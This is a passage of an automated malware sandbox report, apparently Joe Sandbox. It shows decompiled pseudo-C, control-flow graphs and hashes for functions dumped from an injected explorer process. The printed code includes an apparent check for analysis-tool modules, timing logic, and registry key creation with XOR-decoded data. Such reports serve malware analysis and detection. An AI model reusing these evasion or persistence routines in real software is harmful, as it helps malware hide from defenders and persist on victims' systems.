        control_flow_graph 217 c4d6d-c4d8f 218 c4dee-c4e1b call cb7a8 call ca86d call ca471 217->218 219 c4d91-c4db3 call c95c7 * 2 217->219 234 c4e1d-c4e20 218->234 235 c4e25-c4e80 call ce1bc call c95e1 call c92e5 call c85d5 call cb269 218->235 219->218 229 c4db5-c4db7 219->229 229->218 230 c4db9-c4dc4 GetModuleHandleA 229->230 232 c4dcd 230->232 233 c4dc6-c4dcb GetModuleHandleA 230->233 238 c4dd5-c4dec call c85c2 * 2 232->238 233->232 233->238 236 c52b9-c52bf 234->236 252 c4ea1-c4ed9 call c861a call c4a0b 235->252 253 c4e82-c4e93 call c896f 235->253 238->218 238->234 263 c4ef8-c4f1b 252->263 264 c4edb-c4ee3 252->264 259 c4e9c-c4e9f 253->259 260 c4e95-c4e97 call ca2e3 253->260 259->252 260->259 266 c4f1d-c4f2b 263->266 267 c4f2f-c4f54 call ce2c6 263->267 264->263 265 c4ee5-c4ee9 264->265 268 c4eef-c4ef2 265->268 269 c51f3-c5220 call c95e1 call c92e5 265->269 266->267 277 c4f56-c4f6a call ce2c6 267->277 278 c4f71-c4f78 267->278 268->263 268->269 279 c5247-c52b4 call c85d5 lstrcpynW * 2 call c8fbe call c861a * 2 269->279 280 c5222-c522b call cb269 269->280 277->278 278->269 282 c4f7e-c4f87 278->282 313 c52b7 279->313 292 c522d-c5232 280->292 293 c5239-c5246 call c861a 280->293 285 c4f89-c4f8e 282->285 286 c4f96-c4fa3 282->286 285->286 289 c4f90 285->289 286->269 290 c4fa9-c4fad 286->290 289->286 294 c5082-c5088 290->294 295 c4fb3-c4fb6 290->295 292->293 293->279 294->269 297 c508e-c50ff call c49a5 call cfc1f 294->297 295->269 299 c4fbc-c500f call c49a5 call c8604 295->299 297->269 318 c5105-c5119 call c8604 297->318 299->313 317 c5015-c507d call c95e1 call c9640 call c85d5 call ca911 call c861a 299->317 313->236 317->313 318->269 324 c511f-c5171 call c109a call c902d call c60df 318->324 337 c51e5-c51ec call c861a 324->337 338 c5173-c51d1 call c9640 call c85d5 call ca911 324->338 343 c51f1-c51f2 337->343 347 c51d6-c51e2 call c861a 338->347 343->269 347->337
        C-Code - Quality: 70%
        			E000C4D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				void* _t120;
				signed int _t122;
				intOrPtr _t123;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0xde688; // 0xf0000
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t120 = E000CB7A8(0xdb9c8,  &_v516); // executed
					_t14 = _t120 + 1; // 0x1
					E000CA86D( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E000CA471( &_v556, _t298);
					 *0xde748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						_t123 = E000CE1BC(0xdb9cc, _t299); // executed
						 *0xde680 = _t123;
						 *_t337 = 0x610;
						_t124 = E000C95E1(0xdb9cc);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0xde688; // 0xf0000
						_t127 = E000C92E5(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E000C85D5( &_v612);
						_t130 = E000CB269(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E000C861A( &_v616, 0xfffffffe);
						_t133 =  *0xde688; // 0xf0000
						_t22 = _t133 + 0x114; // 0xf0114
						E000C4A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
						_t262 =  *0xde688; // 0xf0000
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_v576 =  *((intOrPtr*)(_t262 + 0x214));
							_t137 =  *0xde680; // 0x64fdb0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564); // executed
							}
							_v620 = _v620 & 0x00000000;
							E000CE2C6(_t353,  &_v576); // executed
							_pop(_t262);
							_t142 =  *0xde6b4; // 0x64fa98
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E000CE2C6(_t353,  &_v588);
								_t235 =  *0xde6b4; // 0x64fa98
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0xde73c;
							if( *0xde73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0xde680; // 0x64fdb0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0xde688; // 0xf0000
								_t262 =  *((intOrPtr*)(_t166 + 0x214));
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E000C49A5();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0xde684; // 0x64f8f0
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0xde688; // 0xf0000
											_t184 = E000CFC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0); // executed
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E000C8604(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E000C109A(_t262, 0x148);
													_t305 =  *0xde688; // 0xf0000
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E000C902D(_t271,  &_v572);
													_t272 =  *0xde688; // 0xf0000
													_t188 = E000C60DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0xde688; // 0xf0000
														__eflags = _t200 + 0x1020;
														E000C9640(_t333, 0x1000, _v636, _t200 + 0x1020);
														E000C85D5( &_v636);
														E000CA911(_t333, 0, 0xbb8, 1); // executed
														E000C861A( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E000C861A( &_v616, 0xfffffffe); // executed
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E000C49A5();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0xde684; // 0x64f8f0
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E000C8604(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E000C95E1(_t278, 0x32d);
										_t280 =  *0xde688; // 0xf0000
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E000C9640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E000C85D5( &_v636);
										E000CA911(_t249, 0, 0xbb8, 1);
										E000C861A( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t238 =  *((intOrPtr*)(_t262 + 0x214));
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E000C95E1(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0xde688; // 0xf0000
								_t329 = E000C92E5(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E000CB269(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0xde684; // 0x64f8f0
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E000C861A( &_v612, 0xfffffffe);
								}
								E000C85D5( &_v616);
								_t150 =  *0xde688; // 0xf0000
								lstrcpynW(_t150 + 0x438,  *0xde740, 0x105);
								_t153 =  *0xde688; // 0xf0000
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0xde738, 0x105);
								_t331 =  *0xde688; // 0xf0000
								_t117 = _t331 + 0x228; // 0xf0228
								 *((intOrPtr*)(_t331 + 0x434)) = E000C8FBE(_t117, __eflags);
								E000C861A(0xde740, 0xfffffffe);
								E000C861A(0xde738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E000C95C7(0x6e2);
				_v616 = _t250;
				_t326 = E000C95C7(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E000C85C2( &_v616);
					_t122 = E000C85C2( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}




















































































        0x000c4d6d
        0x000c4d73
        0x000c4d79
        0x000c4d7e
        0x000c4d8c
        0x000c4d8f
        0x000c4dee
        0x000c4df7
        0x000c4e00
        0x000c4e03
        0x000c4e0a
        0x000c4e0f
        0x000c4e14
        0x000c4e1b
        0x000c4e25
        0x000c4e2c
        0x000c4e32
        0x000c4e37
        0x000c4e3c
        0x000c4e43
        0x000c4e49
        0x000c4e4b
        0x000c4e4c
        0x000c4e50
        0x000c4e5b
        0x000c4e60
        0x000c4e69
        0x000c4e6e
        0x000c4e76
        0x000c4e7d
        0x000c4e7e
        0x000c4e80
        0x000c4e9c
        0x000c4e9f
        0x000c4e9f
        0x000c4ea8
        0x000c4ead
        0x000c4ebd
        0x000c4ec5
        0x000c4eca
        0x000c4ed0
        0x000c4ed3
        0x000c4ed9
        0x000c4ef8
        0x000c4efe
        0x000c4eff
        0x000c4f00
        0x000c4f01
        0x000c4f02
        0x000c4f03
        0x000c4f0d
        0x000c4f11
        0x000c4f16
        0x000c4f19
        0x000c4f1b
        0x000c4f2d
        0x000c4f2d
        0x000c4f2f
        0x000c4f3b
        0x000c4f40
        0x000c4f46
        0x000c4f4f
        0x000c4f52
        0x000c4f54
        0x000c4f5f
        0x000c4f64
        0x000c4f69
        0x000c4f6e
        0x000c4f6e
        0x000c4f71
        0x000c4f78
        0x00000000
        0x000c4f7e
        0x000c4f7e
        0x000c4f83
        0x000c4f87
        0x000c4f89
        0x000c4f8c
        0x000c4f8e
        0x000c4f94
        0x000c4f94
        0x000c4f8e
        0x000c4f96
        0x000c4f9b
        0x000c4fa1
        0x000c4fa3
        0x00000000
        0x000c4fa9
        0x000c4fa9
        0x000c4fad
        0x000c5082
        0x000c5088
        0x000c508e
        0x000c5099
        0x000c509a
        0x000c509b
        0x000c509c
        0x000c50a2
        0x000c50a7
        0x000c50ad
        0x000c50b5
        0x000c50bb
        0x000c50be
        0x000c50cd
        0x000c50d4
        0x000c50d7
        0x000c50e4
        0x000c50e8
        0x000c50f5
        0x000c50fa
        0x000c50fd
        0x000c50ff
        0x000c5110
        0x000c5112
        0x000c5116
        0x000c5117
        0x000c5119
        0x000c5124
        0x000c5129
        0x000c5136
        0x000c513a
        0x000c513b
        0x000c513d
        0x000c5145
        0x000c5146
        0x000c514b
        0x000c5163
        0x000c5168
        0x000c516b
        0x000c516f
        0x000c5171
        0x000c5184
        0x000c518e
        0x000c5192
        0x000c519a
        0x000c519b
        0x000c51a3
        0x000c51a4
        0x000c51a9
        0x000c51b5
        0x000c51bf
        0x000c51d1
        0x000c51dd
        0x000c51e2
        0x000c51e2
        0x000c51ec
        0x000c51f2
        0x000c51f2
        0x000c5119
        0x000c50ff
        0x00000000
        0x000c5088
        0x000c4fb3
        0x000c4fb6
        0x00000000
        0x00000000
        0x000c4fbc
        0x000c4fc7
        0x000c4fc8
        0x000c4fc9
        0x000c4fca
        0x000c4fd0
        0x000c4fd5
        0x000c4fe9
        0x000c4fee
        0x000c4ff2
        0x000c4ffd
        0x000c5006
        0x000c5008
        0x000c500c
        0x000c500d
        0x000c500f
        0x000c501a
        0x000c5020
        0x000c5032
        0x000c5035
        0x000c5038
        0x000c5045
        0x000c504d
        0x000c5057
        0x000c5069
        0x000c5075
        0x000c507a
        0x00000000
        0x000c500f
        0x000c4fa3
        0x000c4edb
        0x000c4edb
        0x000c4ee1
        0x000c4ee3
        0x00000000
        0x00000000
        0x000c4ee5
        0x000c4ee9
        0x000c51f3
        0x000c51f8
        0x000c51fe
        0x000c5200
        0x000c5201
        0x000c5205
        0x000c5215
        0x000c521a
        0x000c521e
        0x000c5220
        0x000c5224
        0x000c5229
        0x000c522b
        0x000c522d
        0x000c5233
        0x000c5233
        0x000c5240
        0x000c5246
        0x000c524c
        0x000c5251
        0x000c526f
        0x000c5271
        0x000c527d
        0x000c527d
        0x000c5283
        0x000c5285
        0x000c528b
        0x000c529d
        0x000c52a3
        0x000c52af
        0x000c52b7
        0x000c52b7
        0x000c52b7
        0x000c52b9
        0x000c52bf
        0x000c52bf
        0x000c4eef
        0x000c4ef2
        0x00000000
        0x00000000
        0x00000000
        0x000c4ef2
        0x000c4ed9
        0x000c4e1d
        0x000c4e1d
        0x00000000
        0x000c4e1d
        0x000c4d9b
        0x000c4da2
        0x000c4dab
        0x000c4dad
        0x000c4db3
        0x000c4dc4
        0x000c4dcd
        0x000c4dcd
        0x000c4dd9
        0x000c4de2
        0x000c4de7
        0x000c4dec
        0x00000000
        0x00000000
        0x000c4dec

        APIs
        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 000C4DC0
        • GetModuleHandleA.KERNEL32(00000000), ref: 000C4DC7
        • lstrcpynW.KERNEL32(000EFBC8,00000105), ref: 000C526F
        • lstrcpynW.KERNEL32(000EFDD8,00000105), ref: 000C5283
        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: HandleModulelstrcpyn
        • String ID:
        • API String ID: 3430401031-0
        • Opcode ID: a465bcc662a9801189247cd59d089760d5b2421ab61ad7513f407ef9ed4bfe34
        • Instruction ID: c173cb8aab5dce0c54eecf333e52df57e25390bf92b520147ff03b0ab50bf869
        • Opcode Fuzzy Hash: a465bcc662a9801189247cd59d089760d5b2421ab61ad7513f407ef9ed4bfe34
        • Instruction Fuzzy Hash: 36E1CF71604341AFE750EF64CC86FAE73E9AB98314F040A2EF944DB2D2DB74D9448B62
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C9B43, Relevance: 6.3, APIs: 4, Instructions: 254COMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 350 c9b43-c9b75 call c8604 353 c9b7e-c9b9e call cb5f6 350->353 354 c9b77-c9b79 350->354 358 c9ba0 353->358 359 c9ba3-c9bb8 call c95c7 353->359 356 c9e1a-c9e1e 354->356 358->359 362 c9cee-c9cfb 359->362 363 c9bbe-c9bd6 359->363 364 c9d3c-c9d4c call c9292 362->364 365 c9cfd-c9d1e 362->365 370 c9bdc-c9bf8 363->370 371 c9ceb 363->371 374 c9d4f-c9d51 364->374 372 c9d54-c9d74 call c85c2 RegOpenKeyExA 365->372 373 c9d20-c9d3a call c9292 365->373 370->372 380 c9bfe-c9c18 call c9292 370->380 371->362 381 c9dc8-c9dcd 372->381 382 c9d76-c9d8b RegCreateKeyA 372->382 373->374 374->372 386 c9d8d-c9db2 call c861a memset call c861a 380->386 393 c9c1e-c9c36 380->393 384 c9dcf 381->384 385 c9dd5 381->385 382->386 387 c9dba-c9dbf 382->387 384->385 391 c9dd8-c9dea RegCloseKey call cc379 385->391 386->387 389 c9dc1 387->389 390 c9dc3-c9dc6 387->390 389->390 390->391 398 c9def-c9df4 391->398 400 c9c38-c9c7c call c95e1 call c92e5 call c85d5 call c9256 393->400 401 c9cab-c9cb0 393->401 402 c9e0b-c9e18 call c861a 398->402 403 c9df6-c9e09 398->403 421 c9c7e-c9c83 400->421 422 c9c8b-c9ca9 call c861a * 2 400->422 407 c9cb6-c9ce9 call c9292 call c861a 401->407 402->356 403->402 403->403 407->372 421->422 424 c9c85 421->424 422->407 424->422
        C-Code - Quality: 86%
        			E000C9B43(char __ecx, int __edx, void* __fp0, int* _a4, int* _a8, int* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				int* _v40;
				int** _v44;
				void _v108;
				int* _t90;
				void* _t91;
				char* _t92;
				long _t96;
				int* _t97;
				int* _t101;
				long _t111;
				int* _t112;
				intOrPtr _t122;
				char* _t125;
				intOrPtr _t126;
				intOrPtr _t128;
				int* _t129;
				intOrPtr _t131;
				int* _t133;
				intOrPtr _t134;
				int* _t135;
				intOrPtr _t136;
				char* _t139;
				int _t143;
				int _t147;
				intOrPtr _t148;
				int* _t149;
				int* _t154;
				int** _t155;
				int* _t161;
				int* _t163;
				intOrPtr _t164;
				intOrPtr _t171;
				int _t176;
				char* _t177;
				char* _t178;
				char _t179;
				void* _t180;
				void* _t181;
				void* _t183;

				_t176 = 0;
				_v24 = __edx;
				_t177 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t155 = E000C8604(0x110);
				_v44 = _t155;
				if(_t155 != 0) {
					_t158 = _a4;
					_t155[0x42] = _a4;
					E000CB5F6(_a4, __edx, __eflags, __fp0, _t158,  &_v108);
					_t161 = _v108;
					__eflags = _t161 - 0x61 - 0x19;
					_t90 = _t161;
					if(_t161 - 0x61 <= 0x19) {
						_t90 = _t90 - 0x20;
						__eflags = _t90;
					}
					_v108 = _t90;
					_t91 = E000C95C7(0x4d2);
					_t163 = _v24;
					_v16 = _t91;
					__eflags = _t163;
					if(_t163 == 0) {
						L16:
						_t164 =  *0xde688; // 0xf0000
						__eflags =  *((intOrPtr*)(_t164 + 0x214)) - 3;
						if( *((intOrPtr*)(_t164 + 0x214)) != 3) {
							_push(_t176);
							_push( &_v108);
							_push("\\");
							_t92 = E000C9292(_t91);
							_t181 = _t181 + 0x10;
							L20:
							_t177 = _t92;
							_v20 = _t177;
							goto L21;
						}
						_v24 = _t176;
						_v8 = 0x80000003;
						_t122 =  *0xde68c; // 0x64fab8
						 *((intOrPtr*)(_t122 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t164 + 0x110)))),  &_v24);
						__eflags = _v24 - _t177;
						if(_v24 == _t177) {
							goto L21;
						}
						_push(_t176);
						_push( &_v108);
						_t125 = "\\";
						_push(_t125);
						_push(_v16);
						_push(_t125);
						_t92 = E000C9292(_v24);
						_t181 = _t181 + 0x18;
						goto L20;
					} else {
						_t126 =  *0xde688; // 0xf0000
						_t128 =  *0xde68c; // 0x64fab8
						_t129 =  *((intOrPtr*)(_t128 + 0x68))(_t163,  *((intOrPtr*)( *((intOrPtr*)(_t126 + 0x110)))));
						__eflags = _t129;
						if(_t129 != 0) {
							_t91 = _v16;
							goto L16;
						}
						_v12 = _t176;
						_t131 =  *0xde68c; // 0x64fab8
						_v8 = 0x80000003;
						 *((intOrPtr*)(_t131 + 0x20))(_v24,  &_v12);
						__eflags = _v12 - _t177;
						if(_v12 == _t177) {
							L21:
							E000C85C2( &_v16);
							_t96 = RegOpenKeyExA(_v8, _t177, _t176, 0x20019,  &_v28);
							__eflags = _t96;
							if(_t96 == 0) {
								_t97 = _a8;
								__eflags = _t97;
								if(_t97 != 0) {
									 *_t97 = 1;
								}
								_push(_v28);
								L30:
								RegCloseKey();
								_t155[0x43] = _v8;
								_t101 = E000CC379(_t177);
								 *_t155 = _t101;
								__eflags = _t101;
								if(_t101 == 0) {
									L32:
									E000C861A( &_v20, 0xffffffff);
									return _t155;
								} else {
									goto L31;
								}
								do {
									L31:
									 *(_t155 + _t176 + 4) =  *(_t180 + (_t176 & 0x00000003) + 8) ^ _t177[_t176];
									_t176 = _t176 + 1;
									__eflags = _t176 -  *_t155;
								} while (_t176 <  *_t155);
								goto L32;
							}
							_v16 = _t176;
							_t111 = RegCreateKeyA(_v8, _t177,  &_v16);
							__eflags = _t111;
							if(_t111 == 0) {
								_t112 = _a8;
								__eflags = _t112;
								if(_t112 != 0) {
									 *_t112 = _t176;
								}
								_push(_v16);
								goto L30;
							}
							L23:
							E000C861A( &_v44, 0x110);
							memset( &_v108, _t176, 0x40);
							E000C861A( &_v20, 0xffffffff);
							goto L1;
						}
						_push(_t176);
						_push(_v16);
						_t178 = "\\";
						_push(_t178);
						_t133 = E000C9292(_v12);
						_t181 = _t181 + 0x10;
						_v40 = _t133;
						__eflags = _t133;
						if(_t133 == 0) {
							goto L23;
						}
						_t134 =  *0xde68c; // 0x64fab8
						_t135 =  *((intOrPtr*)(_t134 + 0x14))(_v8, _t133, _t176, 0x20019,  &_v36);
						__eflags = _t135;
						if(_t135 == 0) {
							_t136 =  *0xde68c; // 0x64fab8
							 *((intOrPtr*)(_t136 + 0x1c))(_v36);
						} else {
							_t143 = E000C95E1( &_v36, 0x34);
							_v24 = _t143;
							_t179 = E000C92E5(_v32);
							_v32 = _t179;
							E000C85D5( &_v24);
							_t183 = _t181 + 0x18;
							_t147 = E000C9256(_v12);
							_v24 = _t147;
							_t148 =  *0xde68c; // 0x64fab8
							_t149 =  *((intOrPtr*)(_t148 + 0x30))(_v8, _t147, _t179, "\\", _t143, _t176);
							__eflags = _t149;
							if(_t149 == 0) {
								_t154 = _a12;
								__eflags = _t154;
								if(_t154 != 0) {
									 *_t154 = 1;
								}
							}
							E000C861A( &_v32, 0xfffffffe);
							E000C861A( &_v24, 0xfffffffe);
							_t181 = _t183 + 0x10;
							_t178 = "\\";
						}
						_t139 = E000C9292(_v12);
						_t171 =  *0xde684; // 0x64f8f0
						_t181 = _t181 + 0x18;
						_t177 = _t139;
						_v20 = _t177;
						 *((intOrPtr*)(_t171 + 0x34))(_v12, _t178, _v16, _t178,  &_v108, _t176);
						E000C861A( &_v40, 0xffffffff);
						goto L21;
					}
				}
				L1:
				return 0;
			}


















































        0x000c9b4c
        0x000c9b4e
        0x000c9b51
        0x000c9b53
        0x000c9b5b
        0x000c9b5e
        0x000c9b65
        0x000c9b6d
        0x000c9b6f
        0x000c9b75
        0x000c9b7e
        0x000c9b86
        0x000c9b8c
        0x000c9b93
        0x000c9b99
        0x000c9b9b
        0x000c9b9e
        0x000c9ba0
        0x000c9ba0
        0x000c9ba0
        0x000c9ba8
        0x000c9bab
        0x000c9bb0
        0x000c9bb3
        0x000c9bb6
        0x000c9bb8
        0x000c9cee
        0x000c9cee
        0x000c9cf4
        0x000c9cfb
        0x000c9d3c
        0x000c9d40
        0x000c9d41
        0x000c9d47
        0x000c9d4c
        0x000c9d4f
        0x000c9d4f
        0x000c9d51
        0x00000000
        0x000c9d51
        0x000c9d00
        0x000c9d0a
        0x000c9d13
        0x000c9d18
        0x000c9d1b
        0x000c9d1e
        0x00000000
        0x00000000
        0x000c9d20
        0x000c9d24
        0x000c9d25
        0x000c9d2a
        0x000c9d2b
        0x000c9d2e
        0x000c9d32
        0x000c9d37
        0x00000000
        0x000c9bbe
        0x000c9bbe
        0x000c9bcb
        0x000c9bd1
        0x000c9bd4
        0x000c9bd6
        0x000c9ceb
        0x00000000
        0x000c9ceb
        0x000c9bdf
        0x000c9be3
        0x000c9beb
        0x000c9bf2
        0x000c9bf5
        0x000c9bf8
        0x000c9d54
        0x000c9d57
        0x000c9d6f
        0x000c9d72
        0x000c9d74
        0x000c9dc8
        0x000c9dcb
        0x000c9dcd
        0x000c9dcf
        0x000c9dcf
        0x000c9dd5
        0x000c9dd8
        0x000c9ddd
        0x000c9de4
        0x000c9dea
        0x000c9def
        0x000c9df2
        0x000c9df4
        0x000c9e0b
        0x000c9e11
        0x00000000
        0x00000000
        0x00000000
        0x00000000
        0x000c9df6
        0x000c9df6
        0x000c9e02
        0x000c9e06
        0x000c9e07
        0x000c9e07
        0x00000000
        0x000c9df6
        0x000c9d79
        0x000c9d86
        0x000c9d89
        0x000c9d8b
        0x000c9dba
        0x000c9dbd
        0x000c9dbf
        0x000c9dc1
        0x000c9dc1
        0x000c9dc3
        0x00000000
        0x000c9dc3
        0x000c9d8d
        0x000c9d96
        0x000c9da2
        0x000c9dad
        0x00000000
        0x000c9db2
        0x000c9bfe
        0x000c9bff
        0x000c9c02
        0x000c9c07
        0x000c9c0b
        0x000c9c10
        0x000c9c13
        0x000c9c16
        0x000c9c18
        0x00000000
        0x00000000
        0x000c9c29
        0x000c9c31
        0x000c9c34
        0x000c9c36
        0x000c9cab
        0x000c9cb3
        0x000c9c38
        0x000c9c3a
        0x000c9c49
        0x000c9c51
        0x000c9c57
        0x000c9c5a
        0x000c9c62
        0x000c9c65
        0x000c9c6f
        0x000c9c72
        0x000c9c77
        0x000c9c7a
        0x000c9c7c
        0x000c9c7e
        0x000c9c81
        0x000c9c83
        0x000c9c85
        0x000c9c85
        0x000c9c83
        0x000c9c91
        0x000c9c9c
        0x000c9ca1
        0x000c9ca4
        0x000c9ca4
        0x000c9cc3
        0x000c9cc8
        0x000c9cce
        0x000c9cd1
        0x000c9cd3
        0x000c9cd9
        0x000c9ce2
        0x00000000
        0x000c9ce8
        0x000c9bb8
        0x000c9b77
        0x00000000

        Memory Dump Source
        • Source File: 00000006.00000002.894836786.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_6_2_c0000_explorer.jbxd
        Similarity
        • API ID: AllocateHeap
        • String ID:
        • API String ID: 1279760036-0
        • Opcode ID: 8353e44af509d9735a0a927840699760167d5c64e14aba3f13b978e54da95b18
        • Instruction ID: d99cd1c3d9fcc3767b0c57ffbf3441cc8e1f37364192496a450fb361744b74f1
        • Opcode Fuzzy Hash: 8353e44af509d9735a0a927840699760167d5c64e14aba3f13b978e54da95b18
        • Instruction Fuzzy Hash: FB913CB1D00209AFDF10DF95CC89EEEBBB8EF18350F10416AF915AB292D7349A00CB61
        Uniqueness

        Uniqueness Score: -1.00%

        Function 000C32A1, Relevance: 6.2, APIs: 4, Instructions: 189pipeCOMMON
        Download Yara Rule

        Control-flow Graph

        • Executed
        • Not Executed
